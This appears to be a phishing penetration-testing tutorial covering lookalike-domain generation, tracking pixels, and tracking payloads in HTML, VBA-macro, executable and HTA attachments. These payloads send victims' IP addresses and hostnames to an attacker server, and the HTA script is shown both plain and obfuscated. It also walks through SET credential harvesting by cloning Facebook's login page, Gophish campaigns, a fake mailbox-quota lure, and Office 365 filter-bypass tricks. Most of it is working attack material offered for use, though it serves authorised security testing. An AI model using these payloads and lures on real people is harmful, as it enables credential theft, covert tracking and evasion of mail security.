Social Engineering Testing - Phishing



Update on 20190527


Design a lookalike domain name with CATPHISH or DNSTWIST. Both generate permutations of the target domain (typos, homoglyphs, alternative TLDs); dnstwist also resolves each candidate so you can see which ones are already registered and pick one that is still free but convincing.


CATPHISH can be retrieved at https://github.com/ring0lab/catphish
DNSTWIST can be retrieved at https://github.com/elceef/dnstwist
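
As an added example (written for this page, not code from either project), the following Python reproduces the kind of permutations these tools generate, so it is clear what a "designed" domain looks like before the real tools are run. Only ASCII-level tricks are covered; the Unicode/IDN homoglyphs, DNS and WHOIS lookups and similarity scoring that dnstwist adds are left out, the substitution and TLD tables are illustrative, and the input domain is constructed.

```python
# Added example: lookalike-domain permutations of the kind CATPHISH and
# DNSTWIST automate. Written for this page; not code from either project.
# Handles a single-label public suffix only (example.com, not example.co.uk).

# ASCII look-alike substitutions (IDN/Unicode homoglyphs deliberately omitted).
HOMOGLYPHS = {
    "o": ["0"], "l": ["1", "i"], "i": ["1", "l"], "e": ["3"], "a": ["4"],
    "s": ["5"], "g": ["q", "9"], "m": ["rn", "nn"], "w": ["vv"], "d": ["cl"],
    "b": ["lb"], "t": ["f"], "n": ["ri"], "u": ["v"], "v": ["u"],
}
# TLDs that are commonly mistyped or resemble the original; extend per target.
ALT_TLDS = ["co", "cm", "om", "net", "org", "info", "io", "co.uk"]


def split_domain(domain):
    """'example.com' -> ('example', 'com'). Raises on a bare label."""
    name, sep, tld = domain.lower().strip().rpartition(".")
    if not sep or not name:
        raise ValueError("expected a registrable domain such as example.com")
    return name, tld


def omission(name):        # exmple
    return {name[:i] + name[i + 1:] for i in range(len(name))}


def transposition(name):   # examlpe
    return {name[:i] + name[i + 1] + name[i] + name[i + 2:]
            for i in range(len(name) - 1) if name[i] != name[i + 1]}


def repetition(name):      # exammple
    return {name[:i] + name[i] + name[i:] for i in range(len(name))}


def homoglyph(name):       # examp1e
    return {name[:i] + sub + name[i + 1:]
            for i, ch in enumerate(name) for sub in HOMOGLYPHS.get(ch, [])}


def hyphenation(name):     # exam-ple
    return {name[:i] + "-" + name[i:] for i in range(1, len(name))}


def subdomain(name):       # exam.ple -> the attacker registers ple.<tld>
    return {name[:i] + "." + name[i:] for i in range(1, len(name))}


TECHNIQUES = {
    "omission": omission, "transposition": transposition,
    "repetition": repetition, "homoglyph": homoglyph,
    "hyphenation": hyphenation, "subdomain": subdomain,
}


def permutations(domain):
    """Candidate lookalikes grouped by technique; never includes the original."""
    name, tld = split_domain(domain)
    out = {tech: sorted(c + "." + tld for c in fn(name) if c != name)
           for tech, fn in TECHNIQUES.items()}
    out["tld-swap"] = sorted(name + "." + t for t in ALT_TLDS if t != tld)
    return out


def all_candidates(domain):
    """Flat, de-duplicated list ready to feed into DNS resolution or WHOIS checks."""
    return sorted(set().union(*permutations(domain).values()))


if __name__ == "__main__":
    for tech, cands in permutations("example.com").items():
        print(f"{tech:14s} {len(cands):3d}  e.g. {', '.join(cands[:4])}")
    print(len(all_candidates("example.com")), "candidates total")
```

The output is only a candidate list; the step the real tools add is resolving each candidate and checking WHOIS, which is what separates a free, registrable lookalike from one already squatted or owned by the target.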


A1. Phishing

1. Build Email Template manually using HTML

2. Include the following HTML tag in the template to record when the mail is opened. The tracker URL is only requested if the recipient's mail client loads remote images, so recipients whose client blocks images leave no trace.

<img src="http://<server_ip>/tracker.php?email=<victim_email>"/>
3. Create tracker.php and an empty log.txt, writable by the web server user, in the DocumentRoot (e.g. /var/www/html).

4. Put the following PHP code in tracker.php.

<?php
// tracker.php: every request is logged as a "mail opened" event.
date_default_timezone_set("Asia/Kuala_Lumpur");
$today = date("d-m-Y H:i:s");
$logMessage = "";   // initialised so a request without parameters does not raise a notice

if (isset($_GET["email"])) {
    // Strip control characters (CR/LF above all) so a crafted URL cannot forge extra log lines.
    $email = preg_replace('/[\x00-\x1F\x7F]/', '', $_GET["email"]);
    $logMessage = '[' . $today . '] ' . $email . ' read the mail from ' . $_SERVER["REMOTE_ADDR"] . "\n";
}

if ($logMessage !== "") {
    $filePath = __DIR__ . "/log.txt";   // next to tracker.php, whatever the working directory is
    $logFile = fopen($filePath, "a+");
    fwrite($logFile, $logMessage);
    fclose($logFile);
}
?>

5. Read log.txt to see who opened the mail. Treat a hit as evidence that the tracker URL was fetched, not that a person read the message: some mail gateways and image proxies (Gmail's, for instance) fetch images on the recipient's behalf, so the logged IP address may belong to the proxy and a hit may arrive before anyone has looked at the mail.
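
The tracker above puts the victim's address in the URL and writes whatever arrives straight into log.txt. As an added example (written for this page, not the page's PHP), the following Python models the same tracker with the two changes a real campaign needs: the pixel URL carries an opaque per-recipient HMAC token instead of the e-mail address, so the address does not leak into proxy and gateway logs and hits cannot be forged for arbitrary people, and every field is sanitised before it is written so a crafted URL cannot inject fake log lines. The campaign key, recipient list, log format and sample hits are all constructed for the example; the PHP side could compute the same token with hash_hmac('sha256', ...).

```python
# Added example (not the page's tracker.php): per-recipient tracking tokens
# and a log writer/parser for the A1 tracking pixel. Key, recipients and
# hits are constructed for the example.
import hmac
import hashlib
import collections
from datetime import datetime, timezone

CAMPAIGN_KEY = b"example-campaign-key-rotate-per-campaign"   # constructed
RECIPIENTS = ["alice@example.test", "bob@example.test", "carol@example.test"]
HEX = set("0123456789abcdef")


def make_token(email, key=CAMPAIGN_KEY):
    """16-hex-char token for one recipient; cannot be derived without the key."""
    return hmac.new(key, email.strip().lower().encode(), hashlib.sha256).hexdigest()[:16]


def pixel_tag(email, server="<server_ip>"):
    """The <img> that replaces tracker.php?email=<victim_email> in the mail template."""
    return f'<img src="http://{server}/tracker.php?t={make_token(email)}" width="1" height="1"/>'


def resolve(token, recipients=RECIPIENTS):
    """Map a token back to a recipient; None for anything the campaign did not issue."""
    if not isinstance(token, str) or len(token) != 16 or not set(token) <= HEX:
        return None
    for r in recipients:
        if hmac.compare_digest(make_token(r), token):
            return r
    return None


def clean(value, limit=200):
    """Log-injection guard: drop control characters (CR, LF and TAB included), cap length."""
    return "".join(ch for ch in str(value) if ch.isprintable())[:limit]


def log_line(token, remote_addr, user_agent, when):
    """One tab-separated log line per hit. Unknown tokens are kept (a scanner or a
    tampered URL is worth knowing about) but attributed to UNKNOWN, not to a person."""
    who = resolve(token) or "UNKNOWN"
    return "\t".join([when.isoformat(), who, clean(remote_addr, 45), clean(user_agent)])


def summarize(lines):
    """{recipient: (open_count, first_seen)} from tracker log lines."""
    count, first = collections.Counter(), {}
    for line in lines:
        ts, who = line.split("\t")[:2]
        count[who] += 1
        first.setdefault(who, ts)
    return {who: (count[who], first[who]) for who in count}


def at(hour, minute):
    return datetime(2019, 5, 27, hour, minute, tzinfo=timezone.utc)


# Constructed hits: Alice opens twice, a forged token, and Bob's client sends a
# User-Agent that tries to inject a fake "carol read the mail" line.
HITS = [
    (make_token("alice@example.test"), "203.0.113.10", "Mozilla/5.0 (Windows NT 10.0)", at(9, 0)),
    (make_token("alice@example.test"), "203.0.113.10", "Mozilla/5.0 (Windows NT 10.0)", at(9, 5)),
    ("0000deadbeef0000", "198.51.100.7", "curl/7.64.1", at(9, 7)),
    (make_token("bob@example.test"), "198.51.100.9",
     "Mozilla/5.0\n[27-05-2019 09:08:00] carol@example.test read the mail.", at(9, 8)),
]


def run(hits=HITS):
    """Process the hits as the tracker would; returns (log_lines, summary)."""
    lines = [log_line(*hit) for hit in hits]
    return lines, summarize(lines)


if __name__ == "__main__":
    lines, summary = run()
    print("\n".join(lines))
    print(summary)
```

Two things to notice in the output: the forged token is logged but not attributed to anyone, and Bob's injected text ends up inside his own User-Agent field rather than as a fresh line claiming Carol opened the mail.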









A2. Attachment (HTML)

1. Create promotion.html with the following content:


<html>
<head></head>
<body>
<script>
// Ask ipinfo.io for the viewer's public IP and country, then report the
// result to the tracker with an image beacon. ipinfo.io answers with CORS
// headers, so the request can work from a page opened from disk; if the
// browser blocks it, nothing is reported.
var xhr = new XMLHttpRequest();
var ip = "";
var country = "";

function processRequest(e) {
    // Act only on the completed, successful response. readyState 1-3 also
    // trigger this handler and would otherwise send empty beacons.
    if (xhr.readyState !== 4 || xhr.status !== 200) {
        return;
    }
    var response = JSON.parse(xhr.responseText);
    ip = response.ip;
    country = response.country;

    // window.location.href is the local path of the opened attachment.
    var log = "[" + Date() + "] " + ip + " from " + country +
              " accessed " + window.location.href + " with HTML attachment.\r\n";

    // The text must be percent-encoded or the spaces and brackets break the URL.
    new Image().src = "http://<server_ip>/tracker.php?attachment=" + encodeURIComponent(log);
}

xhr.addEventListener("readystatechange", processRequest, false);
xhr.open("GET", "http://ipinfo.io/json", true);
xhr.send();
</script>
</body>
</html>

2. Modify tracker.php from A1. Phishing so it also accepts the attachment beacon; add the following block before the lines that write to log.txt:

if (isset($_GET["attachment"])) {
    // Same control-character strip as for "email", plus a newline so each hit is one log line.
    $logMessage = '[' . $today . '] ' . preg_replace('/[\x00-\x1F\x7F]/', '', $_GET["attachment"]) . "\n";
}
3. Send the victim an email with promotion.html attached.

4. Read log.txt to see who opened the attachment. The beacon depends on the browser letting a page opened from disk call ipinfo.io and the tracker; if that request is blocked, an opened attachment leaves no entry.









A3. Attachment (VBA)

1. Create and open promotion.docm.

2. Press Alt + F8 to open the Macros dialog (Alt + F11 opens the VBA editor directly) and create a macro named AutoOpen. Word runs AutoOpen each time the document is opened; AutoExec only runs when Word itself starts or a global template loads, so it would never fire for a mailed .docm.



3. Put the following code in the macro.

Sub AutoOpen()
    ' Runs when the victim opens promotion.docm and clicks "Enable Content".
    ' Errors (no network, WinHTTP blocked) are swallowed so the document still
    ' opens normally and nothing hints at the beacon.
    On Error Resume Next

    Dim MyRequest As Object
    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")

    Dim DateTime As String
    Dim IPAddress As String
    Dim Hostname As String
    Dim Log As String

    DateTime = Now
    IPAddress = GetIPAddress()
    Hostname = Environ("computername")
    Log = "[" & DateTime & "] Accessed to " & IPAddress & " (" & Hostname & ") with attachment."

    ' MsgBox Log
    ' The log text must be percent-encoded: unencoded spaces produce an invalid request line.
    MyRequest.Open "GET", _
        "http://<server_ip>/tracker.php?attachment=" & UrlEncode(Log), False

    ' Send Request.
    MyRequest.Send
End Sub

Function UrlEncode(Text As String) As String
    ' Minimal percent-encoder (ASCII only): letters, digits and -._~ pass through.
    Dim i As Long, ch As String, result As String
    For i = 1 To Len(Text)
        ch = Mid(Text, i, 1)
        If ch Like "[A-Za-z0-9]" Or InStr("-._~", ch) > 0 Then
            result = result & ch
        Else
            result = result & "%" & Right("0" & Hex(Asc(ch)), 2)
        End If
    Next i
    UrlEncode = result
End Function

Function GetIPAddress()
    Const strComputer As String = "."   ' Computer name. Dot means local computer
    Dim objWMIService, IPConfigSet, IPConfig, IPAddress, i
    Dim strIPAddress As String

    ' Connect to the WMI service
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    ' Get all TCP/IP-enabled network adapters
    Set IPConfigSet = objWMIService.ExecQuery _
        ("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE")

    ' Get all IP addresses associated with these adapters, comma-separated
    For Each IPConfig In IPConfigSet
        IPAddress = IPConfig.IPAddress
        If Not IsNull(IPAddress) Then
            If Len(strIPAddress) > 0 Then strIPAddress = strIPAddress & ", "
            strIPAddress = strIPAddress & Join(IPAddress, ", ")
        End If
    Next
    GetIPAddress = strIPAddress
End Function

4. Send the attachment to the victim and read log.txt. The macro only runs after the victim clicks Enable Content in the security bar (Office blocks macros in downloaded documents by default), so a missing entry means either the document was never opened or content was never enabled.







A4. Attachment (Executable File)

1. Create a Console App (.Net Framework) using Microsoft Visual Studio.




2. Edit Program.cs with the following code.


using System;
using System.Net;
using System.Net.Sockets;
using System.Globalization;

namespace TrackMe
{
    class Program
    {
        static void Main(string[] args)
        {
            DateTime localDate = DateTime.Now;
            var culture = new CultureInfo("en-US");
            string datetime = localDate.ToString(culture);

            // Collect the host's IPv4 address (the last one listed wins); this is
            // usually a private LAN address, not the public one.
            string localIP = "";
            string hostname = Dns.GetHostName();
            IPHostEntry host = Dns.GetHostEntry(hostname);
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily == AddressFamily.InterNetwork)
                {
                    localIP = ip.ToString();
                }
            }

            string log = $"[{datetime}] Accessed to {localIP} ({hostname}) with attachment.";

            // Beacon the line to the tracker. The log is percent-encoded so the
            // spaces and brackets survive as one query-string value; failures are
            // swallowed so the program exits quietly when the tracker is unreachable.
            try
            {
                using (var client = new WebClient())
                {
                    client.DownloadString("http://<server_ip>/tracker.php?attachment=" + Uri.EscapeDataString(log));
                }
            }
            catch (WebException)
            {
                // No network or tracker down: exit silently.
            }
        }
    }
}

3. Build the project and send the resulting .exe to the victim. Expect mail gateways to block .exe attachments outright, and Windows to show a SmartScreen / unknown-publisher warning for an unsigned binary downloaded from the Internet; both are part of what the test measures.

4. Study log.txt.






A5. Attachment (HTA File)

Save the following as promotion.hta. Windows hands .hta files to mshta.exe, which runs the embedded script outside the browser sandbox with the user's privileges; the WScript.Shell call here only launches calc.exe as a visible proof of execution.

<html>
<head>
<script>
a=new ActiveXObject('Wscript.Shell');
a.Run("calc.exe",0,false);
</script>
</head>
<body>
</body>
</html>

Obfuscated version, generated with the packer at https://www.cleancss.com/javascript-obfuscate/index.php. This only hides the strings from casual inspection: the eval() wrapper decodes to exactly the script above, so anything that executes or unpacks the payload sees the original.
<html>
<head>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=5 4(\'3.2\');1.6("8.7",0,9);',10,10,'|a|Shell|Wscript|ActiveXObject|new|Run|exe|calc|false'.split('|'),0,{}))
</script>
</head>
<body>
</body>
</html>


B1. Social Engineering Toolkit (SET) 


1. Download SET from https://github.com/trustedsec/social-engineer-toolkit

2. Run setoolkit and select the following sequence of options:
1) Social-Engineering Attacks
  2) Website Attack Vectors
     3) Credential Harvester Attack Method
      2) Site Cloner



root@kali:~/Downloads/social-engineer-toolkit-master# python setoolkit
set> 1
set> 2
set:webattack>3
set:webattack>2

3. Enter your server IP address and the website URL which you would like to clone.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.231.129]:192.168.231.129
set:webattack> Enter the url to clone:https://www.facebook.com





4. Wait for the victim to click the hyperlink in the email and enter credentials on the cloned page.




5. Study the harvested form fields printed in the terminal.



6. Generate the report when the phishing campaign is done (SET writes it when the harvester is stopped with Ctrl + C).






B2. Gophish 


1. Download Gophish at https://getgophish.com.

2. Run gophish.exe (the Windows build; on Linux run the gophish binary).


3. Browse to https://127.0.0.1:3333/login and log in. At the time of writing the default credentials were admin:gophish; since Gophish 0.10.1 the initial admin password is generated at first start and printed in the console log instead, and you are prompted to change it on first login.




B2.1 Setup Sending Profile




B2.2 Create Mail Template 




B2.3 Import Landing page







B2.4 Import User Group







B2.5 Create Campaign




B2.6 Victim Interaction

A sample email as received by the victim is shown below:

The email's source reveals the actual target of the password-reset hyperlink.





B2.7 Monitor Campaign




C. Email Template

Email Storage Full (a fake mailbox-quota bar, 1864 of 2048 MB, built from a plain table so it renders without images)

<table border="0" cellpadding="0" cellspacing="0" width="600"><tr><td valign="top" width="300px" bgcolor="#990000"><font color="white">&nbsp;1864 MB</font></td><td valign="top" width="10px" bgcolor="#c2c2a3">&nbsp;</td><td>&nbsp;2048 MB</td></tr></table>



Email Image
Embedding the image as a data: URI avoids the remote image fetch that mail clients block or warn about. Convert the image to Base64 with: https://www.ofoct.com/html5-app/image-to-css3.html



<img src="data:image/png;base64,..." />


Microsoft Office 365 Bypass

BaseStriker

baseStriker: Office 365 Security Fails To Secure 100 Million Email Users
The <base href> supplies the scheme and host while the anchor carries only the path, so a scanner that inspects the href attribute alone sees "dvwa" and finds nothing to rewrite or check, while the mail client joins the two and sends the click to http://localhost/dvwa.
<html>
<head>
<base href="http://localhost">
</head>
<body>
This is how <a href="dvwa">baseStriker</a> bypass Microsoft Office 365 Safe Links.
</body>
</html>



Zero Font

ZeroFont Phishing: Manipulating Font Size to Get Past Office 365 Security
A text-based filter reads every character, including the font-size:0 fragments, and so classifies the hidden sentence; the recipient sees only the zero-size-free letters, which in the sample below spell roughly "Copy this into a text editor and see why your phishing filter would miss it."
<html>
<head></head>
<body>
<h1>ZeroFont Phishing (Office 365 Bypass)</h1>
<h3><span style="font-size: 0px;">A </span>C<span style="font-size: 0px;">onvincing BEC email </span> o<span style="font-size: 0px;">r </span> p<span style="font-size: 0px;">hish</span>y t<span style="font-size: 0px;">ext </span>hi<span style="font-size: 0px;">de</span>s <span style="font-size: 0px;">with</span>in<span style="font-size: 0px;"> a </span>to<span style="font-size: 0px;">t</span> a <span style="font-size: 0px;">lly different con</span>text <span style="font-size: 0px;">. An advanc</span>ed<span style="font-size: 0px;"> f</span>i<span style="font-size: 0px;">l</span>t<span style="font-size: 0px;">er </span>or <span style="font-size: 0px;">AI sc</span>an<span style="font-size: 0px;">ner shoul</span>d see wh<span style="font-size: 0px;">at </span>y<span style="font-size: 0px;">ou do. If not,</span> your phishing filter would mis<span style="font-size: 0px;">read the way you </span>s<span style="font-size: 0px;">ee</span> it.</h3>
</body>
</html>




Zero-Width Spaces (ZWSPs)

Z-WASP Vulnerability Used to Phish Office 365 and ATP
<a href="http://www&#8204;.google.&#8204;com">Google</a>
&#8204; is the zero-width non-joiner (U+200C); the zero-width space itself is &#8203; (U+200B). Either renders as nothing, so the recipient sees and follows www.google.com while a filter that matches the href text against its URL reputation data sees a string that is not a URL it knows.



NoRelationship Attack

The NoRelationship Attack Bypasses Office 365 Email Attachment Security
Office Open XML documents (.docx, .xlsx, .pptx) list external hyperlink targets in a relationship file (for Word, word/_rels/document.xml.rels); the attack removes the link entries from that file, so a filter that enumerates links from the relationships finds none, while the document body still carries a hyperlink that works when clicked.


Browser Address Bar Spoofing

Apple Safari & Microsoft Edge Browser Address Bar Spoofing - Writeup


